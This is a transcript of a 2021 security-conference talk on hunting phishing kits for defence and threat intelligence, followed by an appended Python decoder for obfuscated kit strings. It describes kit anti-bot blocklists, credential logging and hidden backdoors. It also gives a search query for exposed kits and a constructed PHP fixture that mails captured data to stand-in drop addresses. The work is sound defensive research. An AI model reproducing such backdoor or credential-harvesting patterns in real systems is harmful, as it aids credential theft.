
Hunting Phish Kits - Josh Rickard

BSides KC · 2021
Duration: 46:15
228 views · Published 2021-11
Category: Technical
Style: Talk
About this talk
New phishing websites are set up every few seconds with the intention of stealing your credentials, infecting your system, or convincing you to do something via social engineering. Most of these sites are distributed and deployed through (mostly crude) automation, which usually results in attackers leaving their kits behind. During this talk I will walk through what phish kits are, why they are important for proactive defense and security research, and how you can automate identifying these kits in the wild.

Josh Rickard (Security Research Engineer at Swimlane)

Josh Rickard serves as a security research engineer at Swimlane. He is a GIAC Certified Windows Security Administrator (GCWN) and GIAC Certified Forensic Analyst (GCFA). He has a diverse background ranging from system administration to digital forensics and incident response to managing teams and products. As a Windows security expert, Josh focuses on creating tools to help defend and automate everyday processes using PowerShell and Python. You can engage with Josh via his blog, letsautomate.it, or Twitter at @MSAdministrator.
Transcript (en)

Our next speaker is Mr. Josh Rickard, a very good friend of mine, coming out from Columbia. Still at Swimlane, right? Yup, yup, still doing [ __ ] at Swimlane. He is yet another smart gentleman that is here to talk to us today, so without any further ado, take it away, sir. The best cyber terrorist I know, Josh. Round of applause.

So first of all, I wanted to say a huge shout out to all our sponsors. Let's give them a hand. Without them, I know that this conference and many others are not possible, especially during the pandemic. I'll try to hold the mic, I'm horrible at it, but thank them. All right, let's get started. Today we're going to talk about hunting phish kits. We're going to go into some technical detail, but not a ton, just fair warning. It's more of a "what the hell we need to actually be doing now" instead of waiting and trying to patch and band-aid fix this problem. So again, my name is Josh Rickard. You can follow me on Twitter at @MSAdministrator. It stands for Microsoft, MS Administrator, not Miss Administrator.

My background kind of ranges. I did help desk for a few years, or a year, did IT system support as well as system administration. (You can hear me okay? Right, okay.) And then I pivoted, because I love Windows internals and how the Windows operating system works, so I pivoted into becoming a security analyst. Did that for a few years, and then went into digital forensics and incident response. I did that for a while. Really, the overarching theme for my career has been to automate anything that I can, whether that's turning on my lights or incident response, whatever it is, and I release a lot of open source tools along the way. In fact, that is me in the unicorn head.

So why me? Why should you listen to me about phish kits? Well, I fought phishing at a fairly large scale for a long time, when people didn't really give a [ __ ]. This was back in 2013, 14, 15, those years where phishing was there but no one really cared as much. I did create an open source tool to allow users to actually report phishing emails. I did this, well, funny story: I was out at lunch one day, I think at Chipotle, with a buddy, and I was pissed that day because we had a huge phishing attack and people were not reporting the phishing email correctly, so I would have to email them and say "please forward the original as an attachment," blah blah blah. And I was like, man, it would be awesome if there was some automation around this or whatnot, and he was like, yeah, it'd be awesome if there were just a button that they could click and that's all they had to do. So I went back from lunch, and two weeks later I created a button to do that. It's still being used today, but I released it open source and then got offered to work at PhishMe at the time (Cofense). I was basically their technical product manager and took their install base, with their button and their variants, from one million to about 18 million global installs when I left. During that time I also released a bunch of other automated phishing response tools, whether that's traversing Exchange or Graph API or whatever it is around phishing, I kind of released it.

All right, so the structure of today's talk. We're really going to talk about how we're all the same: we've all been victims of phishing in some capacity, and we're all defenders at heart. Also, we're completely on our own.

No one's going to solve this problem but us. And then we'll just talk about the conclusion.

So imagine we are all living in an apartment complex. Each one of us actually has an apartment in this building. We're all the same in that regard. Yes, we may have a little bit of difference between the locks on our doors and what's inside, but we're basically the exact same. We have those four walls, we have maybe a roof, maybe we have a kitchen, a bedroom, whatever, but we're all in these individual apartments and we try to protect them as much as we can. That's kind of the goal, because phishing is the number one vector we've seen lately for attackers to get inside. They'll steal credentials, they'll traverse, they'll be sending ransomware, whatever it is. We are all impacted by phishing in general.

So imagine we're out and we take a vacation from our apartment, and we go fishing or we go hunting or whatever you want to do, maybe you just lie on a beach, whatever it is. We take time away, but we think that our organization is secure, or our apartments are secure. But in reality we're all victims in some aspect. Someone may come into our apartment, they may steal valuables that we have, credentials, or they may even just steal data, whatever it is, or they may just steal our baby, who knows. I love these icons, so hopefully you get the joke. It's amazing. We're probably being perpetrated by TJ6 here, some guy in a hoodie, a face mask. And likely we're all facing that same threat. It's different threats, it's different people in some cases, but they're ultimately the same. We try to protect as much as possible, whether we build the fancy locks, we put facial recognition on our doors, we put deadbolts, whatever it is. We try to protect our building, and usually in the realm of phishing this is going to be your spam filters, your appliances that you put in the front, whether that's your training or whatever it is. We actually try to defend, and we're all probably doing the same thing: different tools, different processes, but roughly, at a high level, the same process.

Here is just a high-level example of a typical organization. We will have, let's say, some training for a user to report phishing emails. What they do is they identify, hey, we need to report this message, so they do that and they pull it into a centralized mailbox of some sort, where we as security people will either have some automation or manually extract details about that phishing email, whether that's the attachments, the URLs, the headers, whatever it is. And we may look that up in threat intelligence. Who here does this process, just that? Yeah? No? Well, at that point we've made a determination whether it's malicious or not and we block it, maybe on a firewall or on our proxies or whatever tools, as a defense mechanism. Then we take some response, and in this example it's Exchange, it could be Gmail, it could be whatever, but we remove that message maybe from a user's mailbox, especially in a large campaign; you could do it individually. I think this is great and we need to continue doing this. But in addition, and I'm hoping that some people do this, we actually try to train our users to not click on [ __ ]. I should have worn my other shirt, it says "stop clicking on [ __ ]." We try to train them to not do this as much as possible, and this is on top of all the other [ __ ] that we just talked about, where we're enabling them to report messages, we're blocking, we're looking at threat intelligence. We should continue to do all of that, but we're inundated by next-gen and military grade and all these fancy tools that they keep throwing at us. Yes, they're going to help in the moment, but they're always going to be behind the curve no matter what. They're only going to look for active defense and active techniques that are being used. I think that we need to take this approach: continue to do our normal processes as they are, but actually fight back, increase our ability to actually identify these actors and stop them where they're at.

So imagine we get phished. Again, we've all been victims of it, and we want to try to defend our home as much as possible. Let's take another example. What if we're all out fishing, each one of us, f-i-s-h-i-n-g, and we all fish and we're trying to catch this one mystical pound bass or whatever. If we actually go out, maybe I go out on a Tuesday in the afternoon, someone else goes out on Thursday, whatever, we're all trying to catch this one fish, and we can do that, but it's going to take us forever to do so. But if we actually talked and communicated between us, we would have a much better chance of catching that one fish than trying to accomplish this all by ourselves.

So this is the typical phish that you would see. It's branded. This is a PayPal phish kit, but there's other ones: there's four different banks, different tools, Microsoft Office, Office 365, whatever it is. These are the typical kits that you would see, and I want to extract and actually explain what a general phish kit is before we continue. So in my words, I guess a phish kit is a deployable web application. It's a set of tools that basically enable an attacker to go in and deploy a web app in literally the easiest way possible. They package all this up in a .zip, and the attacker will get it and then they'll upload it to a compromised web server and they'll just extract that zip, and they're off to the races. They're done. They may have to do some configuring, we'll talk about that, but for the most part it's just an easy packaged web app that they can deploy and extract and they're on their way.

So in these kits there's a lot of different attributes and a lot of different things that help us detect these kits as well as understand just how they operate. Here you can see there's typically an image folder, and they do this because, hey, we don't want to talk back to paypal.com, we don't want to grab their images, because they're going to know that we're doing this and why we are re-referencing their code, their data. So they'll embed a lot of these images after they've copied them. It's a pretty good indicator, right? If you see HTML relative links to a local path or images like this and it's not paypal.com, it's pretty suspicious. They'll also have an .htaccess file. Anybody here familiar with .htaccess? All right, so .htaccess is pretty much what you see. It basically allows whoever's using that web application to deny or allow access to certain parts of that website. One thing with this: they'll actually continue to add to and populate this list with new scanners, new bots, whatever, that have actually tried to scan their website. They'll just add them to the list, add their subnet, whatever, so they can stop them from doing it. They'll also have a robots.txt, and this is interesting because you have the user agent, and they're saying, okay, all of these user agents are allowed in this example, but we want to disallow everyone from those directories on that website, so you can't access those folders. If you try to view or traverse to that directory, you'd be disallowed. Same below, you can do specific files and all that. But funny enough, they have not figured out that they should block the actual phish kit itself. So when they upload these .zips, they just leave them behind, quick and dirty, and they don't disallow access to it, which is a gold mine for us as defenders.

This is a little hard to see, sorry about that. anti-bots.php. Funny enough, a lot of these websites, web apps, kits, are all written in PHP, I'm guessing because of easy deployment or just lack of knowledge, I don't know. But they use PHP, which is fine, but it's kind of an out-of-date language. What they have here, and I'll try to explain, is that at the top they actually have an array of different names, like Googlebot, Yahoo, whatever, that are scanning their website, that they want to block. Also down here they have banned IPs, and it's a list of IPs and subnets that, basically, if you try to request, they use this on top of that .htaccess file to say 404 Not Found, and then they echo out "hello [ __ ] i [ __ ] love you try bypass me next time bb." I don't know, it's the weirdest thing ever, but that's what they do.

So using the anti-bots.php: if you actually went and did a Google search and you did intitle:"index of" and just searched that, you'll find tons, but if you add a file, or just a quoted string, "anti-bots.php", you'll find even more. And they're all open, they've all been indexed. Not all of them, of course, but many of them have. So if you just want to see some and play around, you'll find it that way.

Another thing that they do on certain kits, this is not so for PayPal, but for ones trying to steal monetary value, basically: they'll actually have built-in credit card validation for AmEx and Discover or whatever type of credit cards that you have out there. They just have a built-in validator, and instead of using some external source to do that validation, they just have a little PHP code that does it. Just kind of interesting to take in. (How's the pandemic? Great.)

One really cool piece, though, is logs. They're so nice, so friendly. In these kits they have logs, they have a logging mechanism across a lot of their code, and funny enough, when they upload that .zip, they've had to do some testing, right? Like, you have to test to make sure it looks like PayPal or whatever, and so they've already enabled this logging and they just zip everything up. Funny enough, in this example they left their own client IPs for all their testing, with their test usernames and all that stuff, because they capture all that information. So in this case it's really easy, but on a live site the code is already there, it's logging, and it's actually logging anybody that entered their credentials or values out to a plain-text file that they don't block, that we can access. Pretty awesome.

And if you're really, really lucky, you get all the wares. You get all the malware, the EXEs, the DLLs. Here is a huge list of different PowerShell scripts that they're using to exploit, but you also get their payloads as well on these servers, which is really cool, because now you have all this cool malware that you can detect. So you have to look for these things, but you're able to just grab them most of the time, just from grabbing that kit alone.

Lastly, man, I wish that was a little darker, sorry. If you cannot tell, this is all ASCII art. It's amazing. In these kits, in the code base, they'll actually include the marks, like what gang, what group they're a part of, what version it is, who created it. This is the PayPal one from Mr. Hallem, that's his name, and this one is really hard to tell, but it says Zestioti, "work hard dream big" is our slogan, and it gives you a link to their Facebook group. So there's a lot of really cool information in here that we can use from a defensive perspective, and overall for tracking these individuals. It's all right there at our fingertips.

All right, so let's go back to our analogy. There's a lot of other things inside of these kits, but the typical thing that you're going to find is PHP code. Some actual web servers will hold tons of different phish, or phishing websites, on them, so that's an even better gold mine, but they're all pretty much the same. Let's say we're gone, we went fishing, we get back to our apartment, and we realize, hey, someone just ran off with all of our [ __ ]. What do we do? We try to defend, right? We try to defend as much as possible. I mean, we go so far into buying technology and buying all these tools to prevent it from happening again, but what we need to do is actually fight back and stop. And there's a fine line between fighting back, borders, and tracking these individuals, but we're waiting just for the next event. Are our tools up to date? Do we have defenses? Do we block IPs? Do we block these indicators or TTPs at our border? Whatever it is, we all try to defend, and that's our natural way of looking at the world. But we're drowning, purely drowning, in thousands and thousands of alerts. I worked a few years ago where I was the only one on call, and we got hit by 300 different phishing websites and phishing emails at one time. How do you protect against that when you're a small team, you're a small organization, just inundated? Nowadays you have a little bit more staff, but you're still overwhelmed by the volume of alerts from your EDR, from your antivirus, from other tools within your environment, that you don't even know where to start.

The one thing that we need to understand is that, I don't care what vendor you are, I work for a vendor, but I don't care which one you're at, none of them are going to actually save you, period. Let's say you get robbed and you go in and you call the police, and they're like, oh yeah, dude, you should have installed locks, better locks, should have protected your windows, should have put a security camera, buy this thing. Yes, that helps for future events, but we're not solving the problem. We're not actually fixing the damn problem.

So we take our typical processes that I talked about earlier, where the user reports that phishing email, we extract data, we block things, we remove things. I think we should do this and still continue to do this, but we need to take a step further in our initial response. We need to actually go and hunt for these phish kits and get them and track them. What I mean is that when you get that phishing email, you get that URL, you get that attachment, whatever, go and figure out, and I'll show you a little bit of how, but go and figure out who the hell is attacking, why are they attacking, what do they want, what are they trying to get. Understanding that concept helps you prevent yourself from being attacked continually, but also all of your other apartment mates in that complex. We have to fight back, in general. I don't know how else to say that. We need to take a proactive approach instead of just constantly waiting for the next phishing email, waiting for that next tool to come out that's going to help us with AI and neural networks or whatever the hell you're going to call it. We have to actually [ __ ] back. I mean, don't go stabbing anybody, but we have to actually perform some sort of understanding of who is attacking us and why. And this comes with a great example with those logs that we were talking about. The logging gives us the ability to actually understand who may have attacked us, who fell victim in our organization. If you go grab that log from that kit or from that site, now you know anybody in your organization that may have fallen victim, plus anybody else in any other organization that you can go notify right off the go. It's all there for us to grab.

Again, we're on our own. There's no vendors that I know of that actually do this. If you know of them, please let me know. But we need to actually track these individuals and understand their TTPs, their IOCs, so we can not only protect us but protect everyone else as well, because we're sitting on a gold mine of data that we need to utilize to actually track these individuals down, or these groups, take down infrastructure, and understand the entire landscape of how it's actually operating, instead of just waiting for the next phish to come and hoping that we have enough defensive controls in place that we can prevent it. But we all know that's not true.

Again, man, I should have done something, sorry about that, guys. And yes, IOCs are not new. So there's a fine line: we want to get to TTPs, tactics, techniques, and procedures, around these attacks, but IOCs are still relevant in my opinion. They're relevant for active defense. What I mean is live, active attacks going on right now. Yes, infrastructure can be redeployed fairly easily. I think I heard a stat that every 18 hours a new phishing website can just be spun up, or on average 18 hours is the time that a phishing website is actually alive. So one day, less than one day. But we can still use those active IOCs, especially to track these individuals over time. They give us some really awesome information. The ASCII art gives us typically the phish kit names, the actors, what version they're building on, where to get it, where you can buy it from. The logs, again, those active logs that are archived inside of that kit when they're doing their testing, but also afterwards, when it's live and they're live-logging anybody that fell victim to that credential theft. Also, what hosting providers do they typically use? You can look that information up. What IPs are they sitting on? Do they typically use those IPs? Do you see a trend? Also WHOIS information, like who registered it. Track those back. Maybe they registered 100 other websites that day, whatever it is. We can actually track all of this information and use it to our defense and be more proactive in that response, instead of just constantly waiting. We can actually take that information: all right, we know they just registered these 100 domains, let's block them all, period. We're not going to get this in. And they also have email addresses.

So inside of these kits, they usually, again, deploy them, extract them, and they'll have built-in places for the users to actually enter their email addresses. So there's a level of hierarchy here that we need to understand. These kits are made by one individual or one group, sold to some other phisher, and then they use it against us. There's an entire development pipeline. I use those terms in very loose manners, but there's an entire development team that are testing these, that are using these, and then they're being sold for like thirty, forty dollars a piece, a hundred dollars for an Office 365 one. Oh, you want an exploit? Let's add in a hundred, whatever it is. They're just selling them hand over fist, and they're doing this at scale. If you really want to know, there's a really cool article that came out yesterday, two days ago, from Microsoft Security about how they took down one of these big manufacturers of these kits, and they explained it all in detail. If you want to know, I can give you the link, but I didn't want to change my slides at the last minute.

But you might see something like this inside of that codebase, inside of that PHP. See this huge string of [ __ ]? It's base64 encoded, and then encoded with rot13, and then gzipped, and then encoded again with rot13. So these manufacturers of these kits are building these kits and placing this in there. Then the user that they sold it to just looks at this and they're like, I don't know what the hell this is, I'm just going to leave it and go on, because they're not typically super technical. These kits, they're buying them because they're easy to set up, easy to get, and I can just get some money and go. When you actually decode all of those, you'll see this, and what this means, it's mostly on the right, is what the scammers are doing: the scammers that are building this kit will actually embed certain email addresses that they want all the responses from that kit to go to. You'll see "do the scott seo" and longnumber.com, that is the payment processor. They actually have payments, so any of these kits that a user falls victim to will send all those credentials or credit card information to the people that deployed that kit, but at the same time, the kit maker backdoored their own code. So I like to sum this up as: the scammers are literally scamming the scammers and they don't know it. So they're getting double. They're getting paid for the kit, now they're getting all the credentials too, and they can process it way faster because they have infrastructure.

We all have our house, right? We're all being attacked by these types of attacks almost on a daily basis. Yeah, I mean, PayPal is a little specific, or less specific, I guess, where you may have something branded to your organization, whatever, but they're still using the same line. Office 365 is probably going to be the best example. I'm sure almost all of you have seen that, or Google Drive or a Google Doc or whatever it is. You've seen that kind of infrastructure in that kit, but it may have your logo instead of just a generic one. It's still a kit. We all have our house, and we all need to do all those things to protect our infrastructure. We have to, and I don't think that we should stop anytime soon.

But we need to go at the extraction point and start gathering that information. It's going to help you, I promise. We're going to get that information, we're going to get those kits, and we're going to understand who was actually attacking us, why, who fell victim to this, and maybe we can help others as well after time. But we all need to actually protect ourselves first, right? We have to. If you're not doing this, even without the phish kit part, if you're not doing that, you need to now. And if you want help, I will literally email, talk to you, or whatever, help you, show you tools that you can automate this [ __ ] with, whatever. I just love it. But the ultimate goal is we need to protect everyone else too. If I'm in, let's say, oil or finance or whatever kind of vertical within my organizational type, there's others that are probably seeing the exact same thing, or they'll be the next victim down the line. When I began, I worked in higher ed, and we would see this all the time. We would see we're getting hit by, let's say, a payroll scam or whatever it is, and we'll see it maybe a year before another university does, because they're just going down the list and they're just hopping and hopping on. So by grabbing this information and sharing it out, we can help someone else, and we'll be able to get that big fish, instead of just constantly battling and constantly trying to defend and keeping all that [ __ ] to ourselves. We shouldn't.

Once you have done that kind of basic response, and you want to start, you even have protected others in your area, even in Kansas City or the Midwest or whatever, it doesn't have to be global, but you need to actually share, you can actually go a step further and be more proactive. These are a couple of the sources that I use. Certificate transparency logs, if you're not familiar: these are every single certificate that is being generated, renewed, used, basically on this large stream of data that you can access, anybody can. They even have a website that makes it super easy. You can also just search domain WHOIS. You can do Pastebin, but it's a dumpster fire, so be careful. And then blackholes or blacklists. Use that information to go and actively find people that are trying to attack you, because it's pretty straightforward once you know the basics of what you're looking for, and now you can actually have a ton more defensive coverage and threat intelligence in your life.

One of the good starting places that I like to bring up is Twitter. There are people out there sharing all the kits and all the phishing websites that they're coming across, but they probably don't work in huge email infrastructure. Like me: I do not have access to thousands or even millions of emails where I'm at, because we're just not that big. Where I was, yeah, millions. We could search, we could do things, we saw all the different types of phishing emails out there. But what you can do is just go to Twitter and search either a hashtag or a stream: opendir, phishkit, phishing kit. You'll just sort by latest and you'll see a stream for days. You'll see something like this, where they'll actually have a whole bunch of hashtags and a whole bunch of links. They have C2 infrastructure. They actually show you, when I said earlier, the Google search with "index of". If you're not familiar, "index of" means it looks like this, where you can actually traverse the file system, basically. This is called an open dir, or an open directory. It means they didn't hide it, which, if it's badly configured, they just don't. But then you can see links and other links, and just keep sharing and sharing and training to help you do this.

I created a tool that you can use. I made it, I think, as dumb as possible. It's Python, but it's called tweetphish. You have to clone the repository and install it; it explains all that. But you can actually save the configuration of your Twitter API, and you have to register that, and I explain that on the site. But once you do that, literally the next time you use it you just say "tweetphish tweet" and then paste the URL that you found, and it'll automatically tweet for you in a fancy format, with hashtags and all that [ __ ], automatically. It's just super simple. Just like next time you get that URL and you're pasting it into VirusTotal or whatever, just paste it into that tool. Done. That's how you get it. So I hope it helps, because we have to start sharing and we have to start talking. If you can't do any of it, you don't want to, send it to me. I'll do it. I'll automate the entire damn thing. There is a... it's loafius, but with a zero, at protonmail.com. Send it to me, I'll take it, I'll automate the entire thing. I do this for fun. I don't know why, I hate myself, but I do.

There's also tons of other tools out there too. There is phishing catcher, phish kit hunter. Just go out to GitHub and just search phish, like p-h-i-s-h. You'll see thousands of repositories of different tools around this. There's tons of them; just sort by the most stars, it's probably the better one, right? Use them. They help you actually find these kits. You enter a URL, and they'll go out and search that entire website for you. You can put it through a proxy, put it on another server, whatever. A lot of them are super, super simple to use, so use them to your advantage. They're all free, and all they can do is help. And share. Once you have that, share it again to Twitter, share it to your colleagues, create a distribution list with all your friends and whatever. Again, share it with me, I don't care. We just have to share this information, because if not, we're not solving the problem. We're defensively protecting ourselves, but we're not actually going after the individuals doing it. We're just waiting for the next, and waiting for the next, and so on and so forth.

I also want to talk about another tool that I created. I'll have a link, I think, at the end, but it's still a work in progress. It was working, I broke it, and, yeah. But if you really want it, let me know and I'll fix it. You could probably use a lot of the code if you're familiar with programming at all, but it's Docker and Docker Compose. It sets up, basically, we pull all the information from all of these sources actively on a scheduled basis, and it will actually put it through a queue that then the trawler service will go and download whatever the hell they can, period. Then we'll save all that, and now we have a database just full of all these kits, binaries, logs, everything about it. It works pretty well, when it worked. Again, you can probably reuse a lot of the code, but it's there. It's called Troll. You can tell the names of [ __ ]... I love making things, so: sounder, guts, spotted, controller, you know, fishing terms.

All right, so the biggest thing that we need to understand as security professionals is that we're not winning the battle. Yes, we are maybe defensively better than we were, let's say, a year ago, but we're not solving the actual problem. We have different blocks, we have different security measures in place, but we're all trying to defend our little slice, and that only goes so far. You're doing work that someone else is doing, that someone else is doing, that someone else is doing, and you're all just doing the same damn work. So you need to actually talk, collaborate, and join forces to actually make a difference in this arena. Yeah, we're all going to be victims and we're all going to get attacked, might be attacked by a bear, who knows, but we actually have to be more proactive with our response mechanisms when it comes to phishing, and these kits have tons of data that we can just use at any point. No one's gonna save us. Superman is not gonna come and protect us. Some vendor is not gonna come and protect us. We have to actually, again, fight back as much as possible, because we are totally on our own. And talk. We have to talk, share, share data, just with a distribution list, a group, Twitter, wherever it is. Get this [ __ ] out there, because you're going to help someone else down the line. Yes, it's another step. Hopefully some of the tools will actually help you with that. If you're like, I need something that would help in this situation, let me know. I love coding, I love Python, and it's pretty easy for me, so just please let me know and I'll build it. It may take a while, but I'll build it.

All right, so here's my info. Again, my name is Josh Rickard. You can follow me on Twitter at @MSAdministrator. Send me phish right there, if you can, if you want, and tweetphish, and then that link for Troll, which is under where I work, Swimlane. Swimlane is a security orchestration, automation, and response company, but, yeah, we released a bunch of open source tools like pyattck, soc-faker, py-ews, tons of other things, and Troll was one of them. So thank you all.
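The stacked encoding the talk describes, where the kit maker hides extra result addresses under base64, rot13 and gzip so the buyer leaves the string alone, can be unwound by an analyst without knowing the layer order. The following is an added example, not code from the talk or from Swimlane's tools; `build_sample` constructs the blob here with an assumed layer order, and `peel`, `extract_drop_addresses` and the sample addresses are hypothetical.

```python
import base64
import binascii
import codecs
import gzip
import re
import zlib

# Addresses a kit reports to: the buyer's own plus any the kit maker hid.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")


def _is_texty(data: bytes) -> bool:
    """Mostly printable ASCII: either source code or a text encoding like base64."""
    if not data:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return printable / len(data) > 0.95


def _try_gzip(data: bytes):
    """gzip stream (PHP gzdecode()); only attempted when the magic bytes match."""
    if data[:2] != b"\x1f\x8b":
        return None
    try:
        return gzip.decompress(data)
    except (OSError, EOFError, zlib.error):
        return None


def _try_base64(data: bytes):
    """Strict base64; whitespace is stripped because kits wrap long strings."""
    stripped = b"".join(data.split())
    if len(stripped) < 8 or len(stripped) % 4:
        return None
    try:
        return base64.b64decode(stripped, validate=True) or None
    except (binascii.Error, ValueError):
        return None


def _try_rot13(data: bytes):
    """rot13 is only meaningful on text; non-letters pass through unchanged."""
    if not _is_texty(data):
        return None
    return codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")


LAYERS = (("gzip", _try_gzip), ("base64", _try_base64), ("rot13", _try_rot13))


def peel(blob: bytes, max_depth: int = 8):
    """Depth-first search over the decoders; returns (layer_names, plaintext) for the
    first path whose output contains an e-mail address, or None if none does."""
    def walk(data, path):
        if _is_texty(data) and EMAIL_RE.search(data.decode("latin-1")):
            return path, data
        if len(path) >= max_depth:
            return None
        for name, fn in LAYERS:
            if name == "rot13" and path and path[-1] == "rot13":
                continue  # rot13 is its own inverse; twice in a row just loops
            out = fn(data)
            if out is None or out == data:
                continue
            found = walk(out, path + [name])
            if found is not None:
                return found
        return None
    return walk(blob, [])


def extract_drop_addresses(blob: bytes):
    """Return (decode_path, sorted unique addresses), or ([], []) if nothing decodes."""
    result = peel(blob)
    if result is None:
        return [], []
    path, text = result
    return path, sorted(set(EMAIL_RE.findall(text.decode("latin-1"))))


def build_sample() -> bytes:
    """Constructed stand-in for the blob a kit maker plants: the buyer's visible
    address plus two hidden drops, wrapped in the assumed layer order."""
    php = (b'<?php\n$to = "operator@example.com";\n'
           b'$hidden = array("drop1@example.net", "drop2@example.org");\n'
           b'foreach ($hidden as $h) { mail($h, "Result", $data); }\n?>')
    layer1 = base64.b64encode(php)
    layer2 = codecs.encode(layer1.decode("ascii"), "rot13").encode("ascii")
    layer3 = gzip.compress(layer2)
    return base64.b64encode(layer3)  # text form, as it would sit in a PHP string


if __name__ == "__main__":
    path, addresses = extract_drop_addresses(build_sample())
    print("layers peeled:", " -> ".join(path), "| mail drops:", ", ".join(addresses))
```

Run over a real kit's string, the decode path tells you which PHP wrappers (base64_decode, str_rot13, gzdecode) the maker stacked, and the address list is what to compare against the addresses the buyer configured in the visible parts of the kit.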